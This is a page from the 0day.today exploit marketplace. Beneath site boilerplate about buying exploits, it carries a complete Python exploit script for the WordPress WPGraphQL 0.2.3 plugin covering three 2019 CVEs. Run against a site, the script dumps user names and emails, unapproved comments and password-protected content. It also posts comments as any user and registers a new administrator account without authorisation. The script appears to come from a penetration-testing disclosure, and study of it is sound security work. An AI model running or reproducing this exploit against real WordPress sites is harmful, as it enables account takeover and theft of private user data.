0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

WordPress WPGraphQL 0.2.3 Plugin - Multiple Vulnerabilities

Author

Simone Quatrini

Risk

[

Security Risk High

]

0day-ID

0day-ID-32755

Category

web applications

Date add

21-05-2019

CVE

CVE-2019-9881
CVE-2019-9880
CVE-2019-9879

Platform

php

#!/usr/bin/env python
#
# Author: Simone Quatrini of Pen Test Partners
# CVEs: 2019-9879, 2019-9880, 2019-9881
# Tested on Wordpress 5.1.1 and wp-graphql 0.2.3
# https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/

import argparse
import requests
import base64
import json
import sys

parser = argparse.ArgumentParser(description="wp-graphql <= 0.2.3 multi-exploit")

parser.add_argument('--url', action='store', dest='url', required=True, help="wp-graphql endpoint. e.g.: http://localhost/wordpress/graphql")

parser.add_argument('--post-comment', nargs=3, action='store', metavar=('postid','userid','commenttext'), dest='comment', required=False, help="Post comment impersonating a specific user. e.g.: --post-comment 2 1 Test")

parser.add_argument('--register-admin', nargs=3, action='store', metavar=('email','password','username'), dest='register', required=False, help="Register a new admin user. e.g.: --register-admin test@example.com MySecretP@ssword hax0r")

parser.add_argument('--verbose', '-v', action='store_true', required=False, help="Shows the full response")

args = parser.parse_args()


def show_plugins(url, headers, verbose):
	payload = {"query":"{plugins{edges{node{name,description,version}}}}"}
	response = requests.post(url, data=json.dumps(payload), headers=headers)
	if response.status_code == 200 and 'node' in response.text:
		print "[+] Installed plugins:"
		parsed = json.loads(response.text)
		for i in parsed['data']['plugins']['edges']:
		    print i['node']['name']+" "+i['node']['version']
	else:
		print "\n[-] Error code fetching plugins: ", response.status_code
	
	if verbose:
		print(response.text)

def show_themes(url, headers, verbose):
	payload = {"query":"{themes{edges{node{name,description,version}}}}"}
	response = requests.post(url, data=json.dumps(payload), headers=headers)
	if response.status_code == 200 and 'node' in response.text:
		print "\n[+] Installed themes:"
		parsed = json.loads(response.text)
		for i in parsed['data']['themes']['edges']:
		    print i['node']['name']+" "+str(i['node']['version'])
	else:
		print "\n[-] Error code fetching themes: ", response.status_code
	
	if verbose:
		print(response.text)

def show_medias(url, headers, verbose):
	payload = {"query":"{mediaItems{edges{node{id,mediaDetails{file,sizes{file,height,mimeType,name,sourceUrl,width}},uri}}}}"}
	response = requests.post(url, data=json.dumps(payload), headers=headers)
	if response.status_code == 200 and 'node' in response.text:
		print "\n[+] Media items:"
		parsed = json.loads(response.text)
		for i in parsed['data']['mediaItems']['edges']:
		    print "/wp-content/uploads/"+i['node']['mediaDetails']['file']
	else:
		print "\n[-] Error code fetching media items: ", response.status_code
	
	if verbose:
		print(response.text)

def show_users(url, headers, verbose):
	payload = {"query":"{users{edges{node{firstName,lastName,nickname,roles,email,userId,username}}}}"}
	response = requests.post(url, data=json.dumps(payload), headers=headers)
	if response.status_code == 200 and 'node' in response.text:
		print "\n[+] User list:"
		parsed = json.loads(response.text)
		for i in parsed['data']['users']['edges']:
		    print "ID: "+str(i['node']['userId'])+" - Username: "+i['node']['username']+" - Email: "+i['node']['email']+" - Role: "+i['node']['roles'][0]
	else:
		print "\n[-] Error code fetching user list: ", response.status_code
	
	if verbose:
		print(response.text)

def show_comments(url, headers, verbose):
	payload = {"query":"{comments(where:{includeUnapproved:[]}){edges{node{id,commentId,approved,content(format:RAW)}}}}"}
	response = requests.post(url, data=json.dumps(payload), headers=headers)
	if response.status_code == 200 and 'node' in response.text:
		print "\n[+] Comments list:"
		parsed = json.loads(response.text)
		for i in parsed['data']['comments']['edges']:
		    print "ID: "+str(i['node']['commentId'])+" - Approved: "+str(i['node']['approved'])+" - Text: "+str(i['node']['content'])
	else:
		print "\n[-] Error code fetching comments list: ", response.status_code
	
	if verbose:
		print(response.text)

def show_password_protected(url, headers, verbose):
	payload = {"query":"{posts(where:{hasPassword:true}){edges{node{title,id,content(format:RAW)}}}}"}
	response = requests.post(url, data=json.dumps(payload), headers=headers)
	if response.status_code == 200 and 'node' in response.text:
		print "\n[+] Found the following password protected post(s):"
		parsed = json.loads(response.text)
		for i in parsed['data']['posts']['edges']:
		    print "ID: "+base64.b64decode(str(i['node']['id']))+" - Title: "+str(i['node']['title'])+" - Content: "+str(i['node']['content'])
	else:
		print "\n[-] No password protected post found"

	if verbose:
		print(response.text)

	payload = {"query":"{pages(where:{hasPassword:true}){edges{node{id,link,title,uri,content(format:RAW)}}}}"}
	response = requests.post(url, data=json.dumps(payload), headers=headers)
	if response.status_code == 200 and 'node' in response.text:
		print "\n[+] Found the following password protected page(s):"
		parsed = json.loads(response.text)
		for i in parsed['data']['pages']['edges']:
		    print "ID: "+base64.b64decode(str(i['node']['id']))+" - Title: "+str(i['node']['title'])+" - Content: "+str(i['node']['content'])
	else:
		print "\n[-] No password protected page found"

	if verbose:
		print(response.text)


def post_comment(url, headers, postID, userID, comment, verbose):
	payload = {"query":"mutation{createComment(input:{postId:"+postID+",userId:"+userID+",content:\""+comment+"\",clientMutationId:\"UWHATM8\",}){clientMutationId}}"}
	response = requests.post(url, data=json.dumps(payload), headers=headers)
	if response.status_code == 200 and 'UWHATM8' in response.text:
		print "[+] Comment posted on article ID "+postID+""
	else:
		print "\n[-] Error posting the comment. Check that postID and userID are correct"

	if verbose:
		print(response.text)

def register_admin(url, headers, email, password, username, verbose):
	payload = {"query":"mutation{registerUser(input:{clientMutationId:\"UWHATM8\",email:\""+email+"\",password:\""+password+"\",username:\""+username+"\",roles:[\"administrator\"]}){clientMutationId}}"}
	response = requests.post(url, data=json.dumps(payload), headers=headers)
	if response.status_code == 200 and 'UWHATM8' in response.text:
		print "[+] New admin created. Login with "+username+":"+password
	else:
		print "\n[-] Registrations are closed, can't proceed."

	if verbose:
		print(response.text)

def check_endpoint(url, headers):
	payload = {'':''}
	response = requests.post(url, data=json.dumps(payload), headers=headers)
	if response.status_code == 200:
		print "[+] Endpoint is reachable\n"
	else:
		print "\n[-] Endpoint response code: ", response.status_code
		sys.exit()
		


url = args.url
headers = {'Content-type': 'application/json', 'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
verbose = args.verbose


# Only in case '--post-comment' is passed
if args.comment:
	postID, userID, comment = args.comment
	check_endpoint(url, headers)
	post_comment(url, headers, postID, userID, comment, verbose)
	sys.exit()

# Only in case '--register-admin' is passed
if args.register:
	email, password, username = args.register
	check_endpoint(url, headers)
	register_admin(url, headers, email, password, username, verbose)
	sys.exit()

# Default actions if only '--url' is passed
show_plugins(url, headers, verbose)
show_themes(url, headers, verbose)
show_medias(url, headers, verbose)
show_users(url, headers, verbose)
show_comments(url, headers, verbose)
show_password_protected(url, headers, verbose)

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

WordPress WPGraphQL 0.2.3 Plugin - Multiple Vulnerabilities

Report Error

Report Error